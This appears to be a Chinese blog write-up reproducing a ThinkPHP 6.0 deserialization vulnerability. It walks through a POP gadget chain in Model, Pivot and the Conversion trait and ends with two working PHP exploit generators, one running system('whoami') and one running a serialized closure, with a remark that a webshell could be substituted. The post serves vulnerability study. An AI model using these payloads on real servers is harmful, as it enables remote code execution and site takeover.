tp6 反序列化漏洞复现

环境

tp6.0 apache php7.3

漏洞分析

反序列化漏洞需要存在 unserialize() 作为触发条件,修改入口文件

app/controller/Index.php

访问localhost/tp6.0/public/index.php/index/jiang出现phpinfo;

全局搜索 __destruct

可利用的在/vendor/topthink/think-orm/src/Model.php

跟进$this->save()

去看一下 setAttrs 方法

    public function setAttrs(array $data): void

    {

        // 进行数据处理

        foreach ($data as $key => $value) {

            $this->setAttr($key, $value, $data);

        }

    }

public function setAttr(string $name, $value, array $data = []): void

    {

        if (……) {

                    ……

        } else {

            // 检测修改器

            $method = 'set' . Str::studly($name) . 'Attr';

            if (method_exists($this, $method)) {

                $array = $this->data;

//注意这里可以调用动态函数,执行命令,但是上面对 method 进行字符串拼接

                $value = $this->$method($value, array_merge($this->data, $data));

    }

这里是不通的,继续往下审计,

跟进 $this->updateDate()

检查数据之后获取有更新的数据,这两个函数可以用来绕过下面的的 if 语句

后面构造pop的时候再细说。

跟进检查允许字段$this->checkAllowFields()

跟进 $this->db

注意这个字符串拼接符号$this->name . $this->suffix ,__toString的触发方式,除了字符串拼接的方式,还可以利用PHP自带函数参数的强制转换,上一篇的复现是用到php 自带函数的强制类型转换。

全局搜索 __toString,芜湖,来到了熟悉的conversion类里

跟进__toArray

前面的遍历先不看,跟进 getAttr()

先看返回值 的 $this->getValue

这里的

 $closure = $this->withAttr[$fieldName];

 $value   = $closure($value, $this->data);

注意看这里,我们是可以控制$this->withAttr的,那么就等同于控制了$closure

可以作为动态函数,执行命令。根据这个点,我们来构造pop。

从__destruct开始

一开始 我们需要 控制 $this->lazySave变量为真,然后进入的 save()方法,需要执行$this->updateDate不能被 提前return,去看 is_Empty() , trigger()方法,

    public function isEmpty(): bool

    {

        return empty($this->data);

//FALSE if var exists and has a non-empty, non-zero value. Otherwise returns TRUE.

//$this->data 可控,设置非空的数组就好。

    }

    protected function trigger(string $event): bool

    {

        if (!$this->withEvent) {

//!$this->withEvent 可控

            return true;

        }

且还需要 $this->exists 为真 ,这个参数也是可控的。

进入 $this->updateData 方法后,我们需要程序执行到 $this->checkAllowFields() 在此之前同样不能被return

跟进 getChangedData()

我们希望 data 不改变,所以就令 $this->force 为真。

$this->lazySave == true

$this->data不为空

$this->withEvent == false

$this->exists == true

$this->force == true

这里解释一下为什么把他们写在一起呢?

因为

model 类是复用了 trait 类 的,可以访问其属性,和方法。Model 类 是抽象类,不能被实例化,所以我们还需要找到其子类。

Pivot 类就是我们需要找的类。

到这里我们成功执行到了 $this->checkAllowFields(),还得进入 $this->db()

$this->field 为空,$this->schema 也为空。初始就是空数组,所以我们不做处理。

现在进入到 $this->db() 里。

$this->name$this->suffix设置为含有__toString的类对象就可以触发此魔术方法。

但是这里有意思的是,我们需要触发 __toString 的类 是 conversion 类 而这个类是 trait类,

而当前的model类是 复用了 conversion类的,所以我们相当于重新调用一遍 Pivot 类。也就是重新调用一下自己,触发自己的的__toString方法。这个操作在buuoj上的一道题目中遇到过。

再接着就是 toJson toArray ,前面两个foreach 不做处理,再下来这个foreach会进入最后一个if分支,调用getAttr方法。这个foreach 是遍历 $this->data ,然后将 $data$key传入

getAttr

$data = array_merge($this->data, $this->relation);

        foreach ($data as $key => $val) {

            if ($val instanceof Model || $val instanceof ModelCollection) {

                // 关联模型对象

                if (isset($this->visible[$key]) && is_array($this->visible[$key])) {

                    $val->visible($this->visible[$key]);

                } elseif (isset($this->hidden[$key]) && is_array($this->hidden[$key])) {

                    $val->hidden($this->hidden[$key]);

                }

                // 关联模型对象

                if (!isset($this->hidden[$key]) || true !== $this->hidden[$key]) {

                    $item[$key] = $val->toArray();

                }

            } elseif (isset($this->visible[$key])) {

                $item[$key] = $this->getAttr($key);

            } elseif (!isset($this->hidden[$key]) && !$hasVisible) {

                $item[$key] = $this->getAttr($key);

            }

        }

进入getAttr 方法,这里的$name 是 $key

跟进getData

跟进getRealFieldName()

$this->strict `默认值为True 所以 `$fieldName = $key

然后 返回的$value值就是 $this->data[$key]

最后return $this->getValue($key, $this->data[$key], $relation)

进入 getValue()

同理,这里的$fieldName 就是 $key 然后 我们设置一下$this->withAttr[$fieldName]的值,进入if(``isset($this->withAttr[$fieldName])) 分支。进行命令执行。

pop链

<?php

namespace think\model\concern;

trait Attribute{

    private $data=['jiang'=>'whoami'];

    private $withAttr=['jiang'=>'system'];

}

trait ModelEvent{

    protected $withEvent;

}

namespace think;

abstract class Model{

    use model\concern\Attribute;

    use model\concern\ModelEvent;

    private $exists;

    private $force;

    private $lazySave;

    protected $suffix;

    function __construct($a = '')

    {

        $this->exists = true;

        $this->force = true;

        $this->lazySave = true;

        $this->withEvent = false;

        $this->suffix = $a;

    }

}

namespace think\model;

use think\Model;

class Pivot extends Model{}

echo urlencode(serialize(new Pivot(new Pivot())));

?>

成功执行

$value  = $closure($value, $this->data);

这个动态函数的参数有两个 第一个是 $data 的 $value 第二个就是 $data 数组。

phpinfo(-1),只可以传入一个参数,导致执行错误。由于参数的限制,所以我们尝试另一种方法。

也就是树哥wp里写的方法,是利用tp自带的SerializableClosure调用

\Opis\Closure\SerializableClosure


$func = function(){phpinfo();};

$closure = new \Opis\Closure\SerializableClosure($func);

$closure($value, $this->data);// 参数不用管,无影响。

修改上面的pop

<?php

namespace think\model\concern;

trait Attribute{

    private $data;

    private $withAttr;

}

trait ModelEvent{

    protected $withEvent;

}

namespace think;

abstract class Model{

    use model\concern\Attribute;

    use model\concern\ModelEvent;

    private $exists;

    private $force;

    private $lazySave;

    protected $suffix;

    function __construct($a = '')

    {

    $func = function(){phpinfo();};//可写马,测试用的phpinfo;

    $b=\Opis\Closure\serialize($func);

        $this->exists = true;

        $this->force = true;

    $this->lazySave = true;

    $this->withEvent = false;

        $this->suffix = $a;

        $this->data=['jiang'=>''];

        $c=unserialize($b);

    $this->withAttr=['jiang'=>$c];

    }

}

namespace think\model;

use think\Model;

class Pivot extends Model{}

require 'closure/autoload.php';

echo urlencode(serialize(new Pivot(new Pivot())));

?>

这个方法搞了一下午,算是整明白了,虽然 tp6 有自带的SerializableClosure

但是我需要构造pop,所以就要自行下载 \Opis\Closure\

链接: https://github.com/opis/closure

使用方法可参照上述exp。

如有问题还请指出,欢迎分享骚姿势。

参照

https://mp.weixin.qq.com/s/G6XNP-S-5ykeKLvtfJVcUw

https://www.gaojiufeng.cn/?id=386

tp6.0.x 反序列化漏洞的更多相关文章

  1. xxl-job <=2.0.2 反序列化漏洞

    xxl-job <=2.0.2 反序列化漏洞 搭建 https://github.com/xuxueli/xxl-job/releases/tag/2.0.2 下载源码,导入idea,mysql ...

  2. ThinkPHP v6.0.x 反序列化漏洞利用

    前言: 上次做了成信大的安询杯第二届CTF比赛,遇到一个tp6的题,给了源码,目的是让通过pop链审计出反序列化漏洞. 这里总结一下tp6的反序列化漏洞的利用. 0x01环境搭建 现在tp新版本的官网 ...

  3. 【原创】Spring Data Redis <=2.0.3反序列化漏洞

    Spring Data Redis隶属于Spring Data家族, 提供简单易用的方式来访问Redis缓存. Spring Data Redis在往Redis里面写数据的时候,默认会先对数据进行序列 ...

  4. WEBLOGIC 11G (10.3.6) windows PSU 升级10.3.6.0.171017(Java 反序列化漏洞升级)

    10.3.6版本的weblogic需要补丁到10.3.6.0.171017(2017年10月份的补丁,Java 反序列化漏洞升级),oracle官方建议至少打上2017年10月份补丁. 一.查看版本 ...

  5. [安洵杯 2019]iamthinking&&thinkphp6.0反序列化漏洞

    [安洵杯 2019]iamthinking&&thinkphp6.0反序列化漏洞 刚开始是403,扫描以下目录,扫描到三个目录. [18:06:19] 200 - 1KB - /REA ...

  6. Java反序列化漏洞执行命令回显实现及Exploit下载

    原文地址:http://www.freebuf.com/tools/88908.html 本文原创作者:rebeyond 文中提及的部分技术.工具可能带有一定攻击性,仅供安全学习和教学用途,禁止非法使 ...

  7. Java反序列化漏洞通用利用分析

    原文:http://blog.chaitin.com/2015-11-11_java_unserialize_rce/ 博主也是JAVA的,也研究安全,所以认为这个漏洞非常严重.长亭科技分析的非常细致 ...

  8. Java反序列化漏洞分析

    相关学习资料 http://www.freebuf.com/vuls/90840.html https://security.tencent.com/index.php/blog/msg/97 htt ...

  9. 小白审计JACKSON反序列化漏洞

    1. JACKSON漏洞解析 poc代码:main.java import com.fasterxml.jackson.databind.ObjectMapper; import com.sun.or ...

随机推荐

  1. ubuntu19.10如何设置固定ip

    $ip a 看见系统中有两块网卡 lo: ...... ens33: ...... #cd /etc/netplan$ls目录下面有文件01-network-manager-all.yaml $sud ...

  2. Java安全之Javassist动态编程

    Java安全之Javassist动态编程 0x00 前言 在调试CC2链前先来填补知识盲区,先来了解一下Javassist具体的作用.在CC2链会用到Javassist以及PriorityQueue来 ...

  3. XSS攻击 js 脚本注入

    原文地址:http://www.cnblogs.com/robot/archive/2009/04/15/1436107.html 1.不要相信Request.QueryString: 相信在asp时 ...

  4. Docker学习笔记之-通过Xshell连接 CentOS服务

    上一节演示如何在虚拟机中安装 CentOS服务,Docker学习笔记之-在虚拟机VM上安装CentOS 7.8 本节主要演示如何通过 Xshell软件链接CentOS服务,本例以虚拟机作为演示,直接在 ...

  5. Spring 缓存抽象

    Spring从3.1开始定义了org.springframework.cache.Cache和org.springframework.cache.CacheManager接口来统一不同的缓存技术:并支 ...

  6. JVM的艺术—类加载器篇(二)

    分享是价值的传递,喜欢就点个赞 引言 今天我们继续来深入的剖析类加载器的内容.上节课我们讲了类加载器的基本内容,没看过的小伙伴请加关注.今天我们继续. 什么是定义类加载器和初始化类加载器? 定义类加载 ...

  7. elk之插件部署 (实操三)

    一.插件安装 下载head以及node软件包: elasticsearch-head.tar.gz node-v8.12.0-linux-x64.tar.gz 找不到这两个包的评论下留言或私我 解压软 ...

  8. elk部署(实战一)

    项目介绍: 系统:redhat7.6 软件:es+logstash+kibana  6.1 IP+主机名 192.168.0.10    elk1 192.168.0.10    elk2 192.1 ...

  9. 《Clojure编程》笔记 第4章 多线程和并发

    目录 背景简述 第4章 多线程和并发 4.0 我的问题 4.1 术语 4.1.1 一个必须要先确定的思考基础 4.2 计算在时间和空间内的转换 4.2.1 delay 4.2.2 future 4.2 ...

  10. 【CHOJ】磁力块

    题意描述 磁力块 在平面内分布着 \(N\) 个磁力块,同时你的手上也有一块. 你一开始站在给定的坐标上,当磁力块之间满足互相吸引的条件时就可以吸引. 当你拿到新的磁石时你就可以用它来吸引更多的石头, ...